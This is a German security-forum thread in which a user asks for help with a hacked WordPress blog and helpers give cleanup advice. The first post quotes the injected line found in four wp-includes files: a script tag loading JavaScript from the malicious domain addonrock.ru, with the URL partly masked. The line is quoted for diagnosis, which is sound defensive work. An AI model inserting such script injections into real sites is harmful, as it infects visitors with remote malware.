Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 17.09.2010, 20:44   #1
Stabilo
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



Hallo,
heute sagte mir mein Bekannter, dass er eine Fehlermeldung bekam, als er seinen Wordpress-Blog aufrufen wollte. Vielleicht ist der folgende Sachverhalt wichtig um die Verbreitung von Malware zu verhindern. Als er an der betreffenden Stelle nach dem Fehler schaute, fand er dort ein unbekanntes Script.

Code:
ATTFilter
<script type="text/javascript" src="h***://addonrock.ru/OCR.js"></script>
<!--c9168d0ef49443a787ad05c469485c26-->
         
Auch stellte er fest, dass in dem "wp-includes"-Ordner vier Dateien zum gleichen Zeitpunkt geändert wurden. In allen Dateien befand sich der oben aufgeführte Quellcode. Geändert wurden im oben benannten Ordner:
- default-constants.php
- default-embeds.php
- default-filters.php
- default-widgets.php

Wenn man die im Quellcode benannte Domain öffnen will, dann kommt bei mir eine Fehlermeldung:
Zitat:
Als attackierend gemeldete Website!

Die Website auf addonrock.ru wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.

Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.

Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert.
Wenn man dort auf das Button "warum wurde diese Seite blockiert?" klickt, kommt folgende Information:
Zitat:
Wie ist die gegenwärtige Einstufung von addonrock.ru?

Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!

Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 1 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

Bei 0 Seite(n) von insgesamt 12 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-09-17 und in den letzten 90 Tagen wurde auf dieser Website kein verdächtiger Content gefunden.

Malicious software includes 17 trojan(s), 6 exploit(s).

This site was hosted on 9 network(s) including AS14929 (VITELITY), AS15830 (TELECITY), AS33823 (GEMENII).

Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?

In den letzten 90 Tagen hat addonrock.ru offenbar als Überträger für die Infektion von 12 Website(s) fungiert, darunter abcmoney2010.com/, varahaschool.com/, naturallove.co.kr/.

Hat diese Website Malware gehostet?

Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.

Wie kam es zu dieser Einstufung?

Gelegentlich wird von Dritten bösartiger Code in legitime Websites eingefügt. In diesem Fall wird unsere Warnmeldung angezeigt.

Nächste Schritte:

* Zur vorherigen Seite zurückkehren.
* Falls Sie Eigner dieser Website sind, können Sie eine Überprüfung Ihrer Website mit den Google Webmaster-Tools anfordern. Weitere Informationen über den Prüfprozess erhalten Sie in der Hilfe für Webmaster.
Jetzt meine Fragen zu diesem Sachverhalt. Kann jemand hilfreiche Angeben machen? Um was handelt es sich hier genau? Reicht es wenn oben benannter Quellcode aus den Dateien entfernt wird, um schädlichen Einfluss zu unterbinden? Wie funktioniert es, dass Dritte den Dateien einfach ein Code beigefügen können?

Vielen Dank bereit für eine Antwort und schonmal ein schönes Wochenende!


Stabilo

Alt 17.09.2010, 20:50   #2
markusg
/// Malware-holic
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



ist denn wortpress und evtl. andres instaliertes zeug alles auf dem neuesten stand? ist der pc des bekannten malware frei?
waren die passwörter eher einfach oder komplex?
__________________


Alt 17.09.2010, 21:01   #3
Stabilo
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



Rechner müsste eigentlich Malwarefrei sein. (Frage nochmal nach)
Die Passwörter sind eigentlich komplex. Ich glaube er verwaltet und generiert diese mit Keypass.
Wordpress aktualisiert er eigentlich auch immer sofort.

Laut diesem google-Safe Browsing sind davon ja scheinbar mehrere/viele Seiten betroffen.
__________________

Alt 17.09.2010, 21:19   #4
markusg
/// Malware-holic
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



deswegen denke ich ja an ne sicherheitslücke. evtl. auch serverseitig, wenn er nicht der admin ist, sollte er evtl. mal nach fragen.
passwörter auf jeden fall endern. vllt die zugriffsrechte für dateien und verzeichnisse einschrenken
Sicherheits-Checkliste für Webmaster - Google Webmaster-Zentrale Blog
hoffe dein bekannter spricht auch englisch, da gibts einiges an tipps
über die logs könnte man vllt auch was raus finden wies elaufen ist

Alt 17.09.2010, 21:23   #5
Stabilo
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



geändert, weil frage erledigt


Geändert von Stabilo (17.09.2010 um 21:33 Uhr)

Alt 17.09.2010, 21:25   #6
markusg
/// Malware-holic
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



die sollten auf dem server deines bekannten sein, müsste er eig wissen, außer er ist vllt gemietet, da kann es sein das er keinen zugriff hatt, das kann ich dir net sagen, deswegen soll er sich ja mal mit dem suport auseinander setzen ob die vllt wissen obs serverseitig lücken gibt

Alt 17.09.2010, 21:37   #7
Stabilo
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



Gut, dann erstmal vielen Dank für die Hilfe!

Alt 20.09.2010, 23:24   #8
Stabilo
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



So, wollte mich noch einmal kurz wegen dem oben beschriebenen Sachverhalt melden. Mein Bekannter hatte auch einen "Bank-Trojaner" auf dem Rechner. Sein System hat er neu aufgespielt, scheinbar hat er jedoch nicht schnell genug alle Passwörter geändert gehabt. Aus allen Seiten, an denen er gearbeitet hat tauchen die benannten Scripte auf.

Was schlagt ihr im Fall Wordpress vor? Reicht es aus, wenn man alle Daten vom Server löscht, dann die Passwörter vom Server erneut ändert, Wordpress neu aufspielt? Kann man dabei die gleiche Datenbank benutzen oder können sich in einer Datenbank auch Malware-Scripte verstecken?

Wie wird man denn am besten mit diesen Sche**-Dingern fertig? Wo gibt es mehr Informationen zu solcehn Trojanern, bzw wie sie funktionieren? Könnte mein Bekannter ggf. den Trojaner von mir bekommen haben (hatte einen Beitrag gepostet wegen einer Tanabfrage bei der Volksbank und dort auch alle Scanberichte beigefügt)?

Hab langsam auch die Schnauze voll von der Technik. Ich glaube ich kaufe mir morgen eine Schreibmaschine...

Alt 21.09.2010, 12:50   #9
markusg
/// Malware-holic
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



ja, löschen und dann den inhalt neu einspielen, passwörter endern natürlich und evtl. den link den ich dir gegeben hab durchlesen, da gibts noch weitere tipps.
solche trojaner verbreiten sich nicht über netzwerkfreigaben usw. wenn du ihm aber ne datei gegeben hast die fragwürdig ist, dann könnte das schon klappen.
ich hatte dir doch tipps zum absichern gegeben glaube ich, die kann er umsetzen auf dem pc

Alt 22.09.2010, 23:25   #10
Stabilo
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



Mit den Tipps funktioniert das soweit auch. Habe das bei mir auf dem Zweitrechner alles soweit eingestellt. MIt der Sandbox habe ich jedoch hin und wieder Probleme. Z.b. Habe ich Filezilla in der Sandbock freigegeben, bekomme aber immer eine Meldung, wenn ich mit zum Server verbinden möchte. Die Meldung sagt aber nur aus, dass es Probleme mit der Freigabe gibt. Was jedoch freigegeben werden soll nicht.

Macht es Sinn zusätzlich eine Firewall zu installieren, in welcher als einzige Programm die Sandbox freigegeben wird?

Alt 23.09.2010, 10:57   #11
markusg
/// Malware-holic
 
Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Standard

Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js



nein, das macht keinen sinn.
hmm kann dir da grad auch nicht weiter helfen, aber filezilla sollte eig auch außerhalb der sandbox kein problem sein.

Antwort

Themen zu Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js
attackierende, aufrufe, bereit, button, bösartiger code, code, computer, dateien, fehlermeldung, festgestellt, folge, frage, funktioniert, google, infektion, malware, programme, script, seite, seiten, server, software, system, trojan, unterbinden, viren, warnmeldung, warum, websites, wichtig, wordpress



Ähnliche Themen: Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js


  1. Apache Traffic Server 6 bringt HTTP/2-Support
    Nachrichten - 22.09.2015 (0)
  2. Sicherheitsupdate für WordPress
    Nachrichten - 23.07.2015 (0)
  3. WordPress-Plug-in Slimstat gefährdet Server
    Nachrichten - 25.02.2015 (0)
  4. Angriffe auf Web-Server via Wordpress-Plugin MailPoet
    Nachrichten - 21.07.2014 (0)
  5. Mac - lokale Wordpress Installation - unerwünschte Hotword Links zu http://de.clickcompare.info
    Alles rund um Mac OSX & Linux - 11.03.2014 (7)
  6. Infektion mit http://www.qvo6.com und http://static.icmapp.com
    Log-Analyse und Auswertung - 04.12.2013 (7)
  7. Wordpress Seite verseucht...
    Plagegeister aller Art und deren Bekämpfung - 12.10.2013 (2)
  8. Alle Server gehackt !? JS, htaccess - http://habboigratis.altervista.org
    Plagegeister aller Art und deren Bekämpfung - 05.02.2013 (3)
  9. Unbekanntes Script verbreitet sich auf Kundenseite
    Plagegeister aller Art und deren Bekämpfung - 21.08.2012 (8)
  10. Wordpress 3.4.1 stopft Sicherheitslücken
    Nachrichten - 29.06.2012 (0)
  11. WordPress 3.1.3 schützt vor Klickdiebstahl
    Nachrichten - 26.05.2011 (0)
  12. WordPress 2.8.5 mit verbesserter Sicherheit
    Nachrichten - 21.10.2009 (0)
  13. Sicherheits-Update für WordPress
    Nachrichten - 04.08.2009 (0)
  14. Ftp server (Filezilla / Quick n´easy FTP server lite)
    Alles rund um Windows - 10.01.2009 (7)
  15. [Suche]Http/Server Virenscanner
    Antiviren-, Firewall- und andere Schutzprogramme - 17.06.2008 (2)
  16. Was ist das: <script language='javascript' src='http://127.0.0.1:1027/js.cgi?pcaw&r=1
    Plagegeister aller Art und deren Bekämpfung - 18.10.2004 (4)
  17. 802.1.x Radius Server, Wlan und Win 2000 server
    Alles rund um Windows - 19.10.2003 (5)

Zum Thema Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js - Hallo, heute sagte mir mein Bekannter, dass er eine Fehlermeldung bekam, als er seinen Wordpress-Blog aufrufen wollte. Vielleicht ist der folgende Sachverhalt wichtig um die Verbreitung von Malware zu verhindern. - Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js...
Archiv
Du betrachtest: Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.